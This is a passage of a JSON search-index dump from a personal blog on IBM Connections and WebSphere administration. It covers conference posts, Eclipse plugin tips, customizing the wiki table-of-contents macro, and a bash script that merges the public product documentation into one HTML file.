la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003e\u003ca href=\"https://twitter.com/73_janr\" target=\"_blank\"\u003eJan Riedel \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n sent me a solution for SLES and\ni tested his proposal today within Windows. He points me in the right\ndirection, i mustn’t load the path or jar within the script, it is\nbetter to load on starting wsadmin. You have to add the JDBC Driver path\nto WAS_EXT_DIRS.\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-02-26-last-weeks-new-scripts-and-next-weeks/","title":"Last weeks, new scripts and next weeks"},{"body":"IBM Connect 2014 is here. I enjoyed the last days very much! Meeting great old and new friends, community members and the IBM Champions family .\nI’m very impressed of the news IBM provides us. New IBM Mail and Connections Mail, Connections next and the integration of lots of software within IBM Connections.\nToday i will make my session “BP 307 – Practical Solutions for Connections Administrators – Tips and Scripts for Your Daily Business” with the incredible Sharon Belamy . When you’re here in Orlando, we would be happy to see you there.\nFind some videos of our demos here: https://www.dropbox.com/sh/2lio4h18rp0r88a/N-Bz9FHXmn ","excerpt":"\u003cp\u003eIBM Connect 2014 is here. I enjoyed the last days very much! Meeting\ngreat old and new friends, community members and the\n\u003ca href=\"https://www.google.com/url?sa=t\u0026amp;rct=j\u0026amp;q=\u0026amp;esrc=s\u0026amp;source=web\u0026amp;cd=1\u0026amp;cad=rja\u0026amp;ved=0CCYQFjAA\u0026amp;url=https://www-304.ibm.com/connections/blogs/socialbusiness/entry/announcing_the_2014_ibm_champions_for_ics1?lang=en_us\u0026amp;ei=WLLnUoesLfPNsQTTrYGwDQ\u0026amp;usg=AFQjCNF7YMDnIDIglZFB_-IUQirkOhCf-w\u0026amp;bvm=bv.59930103,d.cWc\" target=\"_blank\"\u003eIBM\nChampions family \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eI’m very impressed of the news IBM provides us. New IBM Mail and\nConnections Mail, Connections next and the integration of lots of\nsoftware within IBM Connections.\u003c/p\u003e\n\u003cp\u003eToday i will make my session “BP 307 – Practical Solutions for\nConnections Administrators – Tips and Scripts for Your Daily Business”\nwith the incredible \u003ca href=\"http://cube-soft.co.uk/people/\" target=\"_blank\"\u003eSharon Belamy \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. When\nyou’re here in Orlando, we would be happy to see you there.\u003c/p\u003e\n\u003cp\u003eFind some videos of our demos here:\n\u003ca href=\"https://www.dropbox.com/sh/2lio4h18rp0r88a/N-Bz9FHXmn\" target=\"_blank\"\u003ehttps://www.dropbox.com/sh/2lio4h18rp0r88a/N-Bz9FHXmn \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-01-28-ibm-connect-2014/","title":"IBM Connect 2014"},{"body":"I had a very busy week and had no time to enjoy the feeling to be an IBM Champion 2014, as it was announced . But after finishing an IBM Connections update this night at 0:30, i realised it and i’m very proud that i was nominated and elected from IBM.\nSee you all in Orlando!\nThanks to the community!\n","excerpt":"\u003cp\u003eI had a very busy week and had no time to enjoy the feeling to be an IBM\nChampion 2014, as it\n\u003ca href=\"https://www.socialbizug.org/blogs/074c311f-1478-4a20-8774-bb7cf9d1abf4/entry/announcing_the_2014_ibm_champions_for_ics?lang=en_us\" target=\"_blank\"\u003ewas\nannounced \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. But after finishing an IBM Connections update this night at\n0:30, i realised it and i’m very proud that i was nominated and elected\nfrom IBM.\u003c/p\u003e\n\u003cp\u003eSee you all in Orlando!\u003c/p\u003e\n\u003cp\u003eThanks to the community!\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-12-06-weekend-is-near-so-short-word-on-this-week/","title":"Weekend is near, so short word on this week"},{"body":"I started a new project on OpenNTF for the collection of scripts we created to speed up and simplify WebSphere and Connections Administration.\nLink to this project: Administration Scripts for WebSphere In the moment most of documentation is only as comment in these scripts. Descriptions can be found in Github and Scripting101 .\nHighlights J2EE Security Role Backup and Restore\nSet initial Security Roles for Connections Applications (Author: Klaus Bild )\nDocumentation When you want to start with this collection, copy the jython script to your Deployment Manager bin-folder ($WAS_HOME/profiles/Dmgr01/bin) and call the scripts with wsadmin.sh -f scriptname\nI will create more documentation in the next days. Please use the slideshare documents Scripting101 and icon uk presentation to begin using and coding jython.\nDannotes I will present some of these scripts on 50. Dannotes on Thursday 28th November in Korsør.\n","excerpt":"\u003cp\u003eI started a new project on \u003ca href=\"http://www.openntf.org\" target=\"_blank\"\u003eOpenNTF \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n for the\ncollection of scripts we created to speed up and simplify WebSphere and\nConnections Administration.\u003c/p\u003e\n\u003cp\u003eLink to this project:\n\u003ca href=\"http://www.openntf.org/internal/home.nsf/project.xsp?action=openDocument\u0026amp;name=Administration%20Scripts%20for%20WebSphere\" target=\"_blank\"\u003eAdministration\nScripts for WebSphere \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eIn the moment most of documentation is only as comment in these scripts.\nDescriptions can be found in\n\u003ca href=\"https://github.com/stoeps13/ibmcnxscripting\" target=\"_blank\"\u003eGithub \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and\n\u003ca href=\"https://scripting101.org\" target=\"_blank\"\u003eScripting101 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003ch1 id=\"highlights\"\u003eHighlights \u003ca href=\"#highlights\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eJ2EE Security Role Backup and Restore\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSet initial Security Roles for Connections Applications (Author:\n\u003ca href=\"http://kbild.ch\" target=\"_blank\"\u003eKlaus Bild \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1 id=\"documentation\"\u003eDocumentation \u003ca href=\"#documentation\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eWhen you want to start with this collection, copy the jython script to\nyour Deployment Manager bin-folder ($WAS_HOME/profiles/Dmgr01/bin) and\ncall the scripts with wsadmin.sh -f scriptname\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-11-23-openntf-administration-scripts/","title":"New OpenNTF.org project: Administration Scripts for WebSphere"},{"body":"Luis Benitez announced an update for the mobile applications of IBM Connections.\nFunction is looking great. You can now view, approve and reject CCM Files with your mobile device.\nScreenshot from Socialize Me\nRead more: http://www.lbenitez.com/2013/11/ibm-connections-mobile-apps-updated.html ","excerpt":"\u003cp\u003eLuis Benitez announced an update for the mobile applications of IBM\nConnections.\u003c/p\u003e\n\u003cp\u003eFunction is looking great. You can now view, approve and reject CCM\nFiles with your mobile device.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"http://2.bp.blogspot.com/-iRx3Zl7GXvI/UnkzoGkGWzI/AAAAAAAAAd0/BcKpZJvhWX0/s1600/ipadCCM4.png\" alt=\"ipadCCM4\" /\u003e\n\u003c/p\u003e\n\n\nScreenshot from Socialize Me\u003c/p\u003e\n\u003cp\u003eRead more:\n\u003ca href=\"http://www.lbenitez.com/2013/11/ibm-connections-mobile-apps-updated.html\" target=\"_blank\"\u003ehttp://www.lbenitez.com/2013/11/ibm-connections-mobile-apps-updated.html \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003e \u003c/p\u003e\n\u003cp\u003e \u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-11-05-ibm-connections-mobile-apps-update-with-ccm-support/","title":"IBM Connections Mobile Apps Update with CCM Support"},{"body":"This week i attended the Admincamp in Gelsenkirchen. It was a awesome event, where i met lots of friends and other cool people.\nI made two sessions, you can find the session slides here, in this special case in german.\nSecurity and Administration of IBM Connections\nSave the mice – Scripting in WebSphere, Connections and DB2 (Online Version)\nI have extended and translated the session slides from ICONUK.\nYou can download this Slides as ZIP :\nindex.html is ICONUK Version\nindex-ac.html is german AdminCamp Version\nHere some of my impressions: Oping session with Rudi Knegt Very interesting, but sometimes hard to understand was the second evening:\nRudi live on stage and speaking in *rudisch *about geographic things of the Netherlands and flying dutchmen. Ulrich promised he has a video, i will link it here, when i have found it.\nResume: i enjoyed it very much and i’ll come back next year.\n","excerpt":"\u003cp\u003eThis week i attended the Admincamp in Gelsenkirchen. It was a awesome\nevent, where i met lots of friends and other cool people.\u003c/p\u003e\n\u003cp\u003eI made two sessions, you can find the session slides here, in this\nspecial case in german.\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\n\u003cp\u003eSecurity and Administration of IBM Connections\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSave the mice – Scripting in WebSphere, Connections and DB2 (Online\nVersion)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003eI have extended and translated the session slides from ICONUK.\u003c/p\u003e\n\u003cp\u003eYou can\n\u003ca href=\"/images/2013/09/WebSphereScripting.zip\"\u003edownload this Slides as ZIP\u003c/a\u003e\n:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eindex.html is ICONUK Version\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eindex-ac.html is german AdminCamp Version\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1 id=\"here-some-of-my-impressions\"\u003eHere some of my impressions: \u003ca href=\"#here-some-of-my-impressions\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003ch2 id=\"oping-session-with-rudi-knegt\"\u003eOping session with Rudi Knegt \u003ca href=\"#oping-session-with-rudi-knegt\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2013/09/wpid-Photo-26.09.2013-2106.jpg\" alt=\"wpid Photo 26.09.2013 2106\" /\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-09-27-admincamp-2013-updated-slides-in-german/","title":"Admincamp 2013 – updated slides in german"},{"body":"IBM finally released CR2 for IBM Connections 4.5\nYou find more details and download links here .\nOne fix is the hard coded wikis toc strings. Will test it.\nUpdate You have to update FNCS to 2.0.0.1-FNCS-IF001 . Document contains a short description of the update procedure (Do not forget to read the whole document! Backup the files, because you have to restore them later).\nCognos and Metrics Database needs some changes .\n","excerpt":"\u003cp\u003eIBM finally released CR2 for IBM Connections 4.5\u003c/p\u003e\n\u003cp\u003eYou find more details and\n\u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21649769\u0026amp;myns=swglotus\u0026amp;mynp=OCSSYGQH\u0026amp;mync=R\" target=\"_blank\"\u003edownload\nlinks here \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eOne fix is the hard coded wikis toc strings. Will test it.\u003c/p\u003e\n\u003ch1 id=\"update\"\u003eUpdate \u003ca href=\"#update\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eYou have to\n\u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21640797\" target=\"_blank\"\u003eupdate FNCS to\n2.0.0.1-FNCS-IF001 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. Document contains a short description of the update\nprocedure (Do not forget to read the whole document! Backup the files,\nbecause you have to restore them later).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eCognos and Metrics Database\n\u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21648864\" target=\"_blank\"\u003eneeds some\nchanges \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/posts/2013/2013-09-16-ibm-connections-4-5-cr2/","title":"IBM Connections 4.5 CR2 released"},{"body":"I added several plugins to my Eclipse, so i can access the scripts on GitHub and edit through an IDE:\nJython and Python Development PyDev: http://pydev.org/updates Markdown (Documentation within Github) Markdown: http://winterwell.com/software/updatesite/ Access GitHub: EGIT: http://download.eclipse.org/egit/updates Shellscript Editor EasyShell: http://pluginbox.sourceforge.net ShellEd: http://sourceforge.net/projects/shelled/files/shelled/update/ SQL Scripts SQL Explorer: http://eclipsesql.sourceforge.net/ ","excerpt":"\u003cp\u003eI added several plugins to my Eclipse, so i can access the\n\u003ca href=\"http://github.com/stoeps13/ibmcnxscripting\" target=\"_blank\"\u003escripts on GitHub \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and edit\nthrough an IDE:\u003c/p\u003e\n\u003ch1 id=\"jython-and-python-development\"\u003eJython and Python Development \u003ca href=\"#jython-and-python-development\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003ePyDev: \u003ca href=\"http://pydev.org/updates\" target=\"_blank\"\u003ehttp://pydev.org/updates \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003ch1 id=\"markdown-documentation-within-github\"\u003eMarkdown (Documentation within Github) \u003ca href=\"#markdown-documentation-within-github\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eMarkdown: \u003ca href=\"http://winterwell.com/software/updatesite/\" target=\"_blank\"\u003ehttp://winterwell.com/software/updatesite/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003ch1 id=\"access-github\"\u003eAccess GitHub: \u003ca href=\"#access-github\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eEGIT: \u003ca href=\"http://download.eclipse.org/egit/updates\" target=\"_blank\"\u003ehttp://download.eclipse.org/egit/updates \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003ch1 id=\"shellscript-editor\"\u003eShellscript Editor \u003ca href=\"#shellscript-editor\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eEasyShell: \u003ca href=\"http://pluginbox.sourceforge.net\" target=\"_blank\"\u003ehttp://pluginbox.sourceforge.net \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eShellEd: \u003ca href=\"http://sourceforge.net/projects/shelled/files/shelled/update/\" target=\"_blank\"\u003ehttp://sourceforge.net/projects/shelled/files/shelled/update/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003ch1 id=\"sql-scripts\"\u003eSQL Scripts \u003ca href=\"#sql-scripts\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eSQL Explorer: \u003ca href=\"http://eclipsesql.sourceforge.net/\" target=\"_blank\"\u003ehttp://eclipsesql.sourceforge.net/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-09-15-eclipse-as-a-jython-ide/","title":"Eclipse As A Jython IDE"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/iconuk/","title":"IconUK"},{"body":"This year i attended the ICON UK in Brighton. I enjoyed it very much to speak in front of a great audience and to meet friends and “lotus” guys again.\nYou can review my session slides here .\nI extended some scripts from socconv and add a short part jython introduction.\n","excerpt":"\u003cp\u003eThis year i attended the ICON UK in Brighton. I enjoyed it very much to\nspeak in front of a great audience and to meet friends and “lotus” guys\nagain.\u003c/p\u003e\n\u003cp\u003eYou can review my session slides \u003ca href=\"http://resources.stoeps.de/iconok2013\" target=\"_blank\"\u003ehere \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eI extended some scripts from socconv and add a short part jython\nintroduction.\u003c/p\u003e\n\u003cp\u003e \u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-09-05-iconuk-2013/","title":"ICONUK 2013"},{"body":"I have read about a new function in IBM Connections Wiki, which I missed until now. A new macro to create a table of contents within a wiki page.\nThe activation of this macro is documented here: Wikis configuration properties wikimacros.enabled Specifies whether macros are enabled in Wikis. You can use macros to automate common tasks, such as generating a table of contents in a wiki page. The default value of this parameter is false. To enable macros, set the value to true. When enabled, macros are available from the Macros menu in the editor toolbar.\nDocumentation I’m a little confused (the config option should be editor.wikimacros.enabled).\nwikis-config.xml: \u0026lt;editor\u0026gt; \u0026lt;wikitexttab enabled=\u0026#34;true\u0026#34; /\u0026gt; \u0026lt;wikimacros enabled=\u0026#34;true\u0026#34; /\u0026gt; \u0026lt;!-- add this line --\u0026gt; \u0026lt;/editor\u0026gt; After checking in the configuration file and restart connections I got a new button in my wikis\u0026rsquo; editor:\nQuite cool, but the macro only generate headings with format h2, h3 and h4 to the TOC. The Richtext editor provides headings h1-h4. I want to change this behavior, that h1 will be added to TOC too.\nI found a great article on adding templates to CKEditor from Rob Novak , there he describes how you can customize the CKEditor of wikis. I used the paths mentioned in this article to customize the TOC behavior.\nThe link is no longer available, I couldn\u0026rsquo;t find the article anywhere. So I keep this link as a reference. Thanks again Rob.\nExtract toc.js You can find the needed file com.ibm.lconn.wikis.web.resources_3.5.0.20130627-1601.jar in your shared directory, e.g. /opt/IBM/Connections/data/shared/provision/webresources. I extracted it to /tmp:\nunzip -d /tmp/ckeditor /opt/IBM/Connections/data/shared/provision/webresources/com.ibm.lconn.wikis.web.resources_3.5.0.20130627-1601.jar Create customization path and copy toc.js mkdir -p /opt/IBM/Connections/data/shared/customization/javascript/lconn/wikis/macros cp /tmp/ckeditor/resources/macros/toc.js /opt/IBM/Connections/data/shared/customization/javascript/lconn/wikis/macros Change toc.js vim /opt/IBM/Connections/data/shared/customization/javascript/lconn/wikis/macros/toc.js You find the following part:\nlconn.wikis.macros.toc = { //node id sequence for TOC link. fragmentSeqn: 1, topLevel: 2, bottomLevel: 4, template: \u0026#39;Table of Contents:\u0026lt;INSERT-BODY\u0026gt;\u0026#39;, You have to change topLevel and bottomLevel to following:\nlconn.wikis.macros.toc = { //node id sequence for TOC link. fragmentSeqn: 1, topLevel: 1, bottomLevel: 5, template: \u0026#39;Table of Contents:\u0026lt;INSERT-BODY\u0026gt;\u0026#39;, After a new Connections restart my toc got updated with h1 – h5.\nUpdate Change Styles If you want to change the default style of your tocs, you can do this in the toc.js file too! I prefer my TOC on the right screen side and with a light grey not yellow background.\nI changed:\nstyle: \u0026#39;border-radius: 6px; margin: 8px; padding: 4px; display: block; width: 50%;background-color: #ffc;\u0026#39;, To:\nstyle: \u0026#39;border-radius: 6px; margin: 8px; padding: 4px; display: block; width: 30%;background-color: #E0E0E0;float:right;padding:10px;margin-left:20px;margin-bottom:20px;\u0026#39;, Now i have a little bit smaller toc with additional space to the content:\nIt would be better to define the styles through a CSS file in the customization folder, but I only wanted to test it. When you want to change through a CSS file, then you should remove most of the styles from the line starting with: style:.\nUpdate 2022-07-11 I tested the configuration today with Connections 7.0 and installed CFix.70.2206. Except of the jar name, which is now com.ibm.lconn.wikis.web.resources_3.5.0.20220608-0715.jar, the whole process to enable and customize is still working. After changing wikis-config.xml the Macros \u0026gt; Table Of Contents button appears in all Connections editors (CKEditor, textbox.io and TinyMCE)!\n","excerpt":"\u003cp\u003eI have read about a new function in IBM Connections Wiki, which I missed until now.\nA new macro to create a table of contents within a wiki page.\u003c/p\u003e\n\u003cp\u003eThe activation of this macro is documented here:\n\u003ca href=\"http://www-10.lotus.com/ldd/lcwiki.nsf/xpDocViewer.xsp?lookupName=IBM%20Connections%204.5%20Documentation#action=openDocument\u0026amp;res_title=Wikis_configuration_properties_ic45\u0026amp;content=pdcontent\u0026amp;sa=true\" target=\"_blank\"\u003eWikis configuration properties \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\n\n\u003cblockquote class=\"blockquote px-4 py-2 bg-secondary mx-md-3 mx-xl-5 rounded fst-italic stoeps-blockquote\" \u003e\n \u003cdiv class=\"d-flex flex-row\"\u003e\n \u003cdiv class=\"me-3\"\u003e\n \u003ci class=\"las la-sms la-3x\"\u003e\u003c/i\u003e\n \u003c/div\u003e\u003cdiv\u003e\u003cp class=\"mb-0\"\u003e\n \u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-fallback\" data-lang=\"fallback\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewikimacros.enabled\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eSpecifies whether macros are enabled in Wikis. You can use macros to automate common tasks, such as generating a table of contents in a wiki page. The default value of this parameter is false. To enable macros, set the value to true. When enabled, macros are available from the Macros menu in the editor toolbar.\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/activate-customize-table-of-contents-macro-in-ibm-connections-wiki/","title":"Activate and customize “Table of contents” macro in IBM Connections Wiki"},{"body":"The IBM Connections Product Documentation is only available as a set of Wiki Documents and in a accessible version (5 single html documents) .\nI don’t like both versions. Searching is hard and printing only single documents (to paper or pdf) is a torture. The format is only for a complete display, no mobile version and using only half of a display do not wrap the text.\nSo i want to have a converted document which is searchable, has numbered headlines and can be converted to mobi or kindle format.\nYou want this too? How? Requirements Linux VM (e.g. Knoppix or other Live Linux)\nHTML Tidy sed wget I created a linux shell script which downloads the accessible version of the product documentation and removes / adds some lines. I added a alternative stylesheet (numbering headlines) and a javascript file (toc on top of the document) . Copy both files to the directory of the html documentation.\nHere the script and some explanations on it:\n#!/bin/bash wget -mk http://infolib.lotus.com/resources/connections/4.5.0/doc/accessible/admin/en_us/acc_p1.html wget -mk http://infolib.lotus.com/resources/connections/4.5.0/doc/accessible/admin/en_us/acc_p2.html wget -mk http://infolib.lotus.com/resources/connections/4.5.0/doc/accessible/admin/en_us/acc_p3.html wget -mk http://infolib.lotus.com/resources/connections/4.5.0/doc/accessible/admin/en_us/acc_p4.html wget -mk http://infolib.lotus.com/resources/connections/4.5.0/doc/accessible/admin/en_us/acc_p5.html Download the html files inclusivly with images, scripts and stylesheets.\nAfter downloading the files, change to the folder of acc_p1.html:\nFILEPATH=infolib.lotus.com/resources/connections/4.5.0/doc/accessible/admin/en_us cd $FILEPATH Run tidy on the html files to seperate the html tags and indent the code:\nfor i in $(seq 1 5); do tidy -wrap 0 -c -i acc_p${i}.html \u0026gt; acc_p${i}_a.html done No remove the html header and toc of the files:\n# remove head and foot (incl toc) for i in $(seq 1 5); do sed \u0026#39;1,/\u0026lt;div class=\u0026#34;nested0\u0026#34; role=\u0026#34;main\u0026#34;/d;/\u0026lt;\\/body\u0026gt;/,$d\u0026#39; acc_p${i}_a.html \u0026gt; acc_p${i}_b.html done Create a file with header informations (title, stylesheets):\nsed \u0026#39;/\u0026lt; \\/head\u0026gt;/,$d\u0026#39; acc_p1.html \u0026gt; head.html sed -i \u0026#39;s/\u0026lt;link rel=\u0026#34;stylesheet\u0026#34;[^/\u0026gt;]*\u0026gt;//g\u0026#39; head.html sed -i \u0026#39;/\u0026lt;title\u0026gt;/d\u0026#39; head.html echo \u0026#39;\u0026lt;link rel=\u0026#34;stylesheet\u0026#34; type=\u0026#34;text/css\u0026#34; href=\u0026#34;custom.css\u0026#34; /\u0026gt;\u0026#39; \u0026gt;\u0026gt; head.html echo \u0026#39;\u0026lt;/title\u0026gt;\u0026lt;title\u0026gt;IBM Connections 4.5 CR1\u0026lt;/title\u0026gt;\u0026#39; \u0026gt;\u0026gt; head.html echo \u0026#39;\u0026lt;script type=\u0026#34;text/javascript\u0026#34; src=\u0026#34;toc.js\u0026#34;\u0026gt;\u0026lt;/script\u0026gt;\u0026#39; \u0026gt;\u0026gt; head.html echo \u0026#39;\u0026lt;body\u0026gt;\u0026#39; \u0026gt;\u0026gt; head.html Create a file with footer informations:\nsed \u0026#39;/\u0026lt; \\/body\u0026gt;/,$d\u0026#39; acc_p1.html \u0026gt; foot.html Create a singe html file of the Connections documentation and add head and foot:\ncat head.html \u0026gt; cnx45documentation.html for i in $(seq 1 5) ; do cat acc_p${i}_b.html \u0026gt;\u0026gt; cnx45documentation.html done cat foot.html \u0026gt;\u0026gt; cnx45documentation.html Rewrite all links and anchors to the new filename:\nsed -i -e \u0026#39;s/href=\u0026#34;acc_p[1-5].html#/href=\u0026#34;cnx45documentation.html#/g\u0026#39; cnx45documentation.html So you’re nearly done! Copy the custom.css and toc.js in the directory and you can open the documentation. You can use half display, print to pdf, convert it to kindle (e.g. calibre) and other ebook formats.\nThe script does not delete temporary files. I copy only cnxdocumentation.html, toc.js and custom.css to a seperate folder and delete the downloaded files. If you want the images (there are only few), you need to copy these too.\nConfiguration of toc.js Here is my setting i used for the toc.\ncontainer : \u0026#34;false\u0026#34;, headline : 1, minNavPoints : 2, insertAfter : \u0026#34;body\u0026#34;, headlineText : \u0026#34;Table of Contents\u0026#34;, listType : \u0026#34;OL\u0026#34;, Download the script file. custom.css h1{counter-reset: h2counter} h2{counter-reset: h3counter} h3{counter-reset: h4counter} h4{counter-reset: h5counter} h5{counter-reset: h6counter} h1:before{ counter-increment: h1counter; content: counter(h1counter) \u0026#34; \u0026#34;; } h2:before{ counter-increment: h2counter; content: counter(h1counter) \u0026#34;.\u0026#34; counter(h2counter) \u0026#34; \u0026#34;; } h3:before{ counter-increment: h3counter; content: counter(h1counter) \u0026#34;.\u0026#34; counter(h2counter) \u0026#34;.\u0026#34; counter(h3counter) \u0026#34; \u0026#34;; } h4:before{ counter-increment: h4counter; content: counter(h1counter) \u0026#34;.\u0026#34; counter(h2counter) \u0026#34;.\u0026#34; counter(h3counter) \u0026#34;.\u0026#34; counter(h4counter) \u0026#34; \u0026#34;; } h5:before{ counter-increment: h5counter; content: counter(h1counter) \u0026#34;.\u0026#34; counter(h2counter) \u0026#34;.\u0026#34; counter(h3counter) \u0026#34;.\u0026#34; counter(h4counter) \u0026#34;.\u0026#34; counter(h5counter) \u0026#34; \u0026#34;; } h6:before{ counter-increment: h6counter; content: counter(h1counter) \u0026#34;.\u0026#34; counter(h2counter) \u0026#34;.\u0026#34; counter(h3counter) \u0026#34;.\u0026#34; counter(h4counter) \u0026#34;.\u0026#34; counter(h5counter) \u0026#34;.\u0026#34; counter(h6counter) \u0026#34; \u0026#34;; } body{font-family:sans-serif; max-width:1024px; min-width:300px; left:auto; right:auto; font-size:12px; } p { font-size:11px; line-height:110%; } code,kbd { margin:10px; } h1,h2,h3,h4,h5,h6{ color:darkblue; font-weight:bold; font-size:110%; } You can download the script and css file on github:\nhttps://github.com/stoeps13/ibmcnxscripting/tree/master/web/createdocu ","excerpt":"\u003cp\u003eThe \u003ca href=\"http://www-10.lotus.com/ldd/lcwiki.nsf\" target=\"_blank\"\u003eIBM Connections Product\nDocumentation \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n is only available as a set of Wiki Documents and in a\n\u003ca href=\"http://infolib.lotus.com/resources/connections/4.5.0/doc/accessible/admin/en_us/acc_top.html\" target=\"_blank\"\u003eaccessible\nversion (5 single html documents) \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eI don’t like both versions. Searching is hard and printing only single\ndocuments (to paper or pdf) is a torture. The format is only for a\ncomplete display, no mobile version and using only half of a display do\nnot wrap the text.\u003c/p\u003e\n\u003cp\u003eSo i want to have a converted document which is searchable, has\n\u003ca href=\"http://stackoverflow.com/questions/535334/html-css-autonumber-headings\" target=\"_blank\"\u003enumbered\nheadlines \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and can be converted to mobi or kindle format.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2013/07/2013-07-15_21-36-58.png\" alt=\"2013 07 15 21 36 58\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003ch1 id=\"you-want-this-too-how\"\u003eYou want 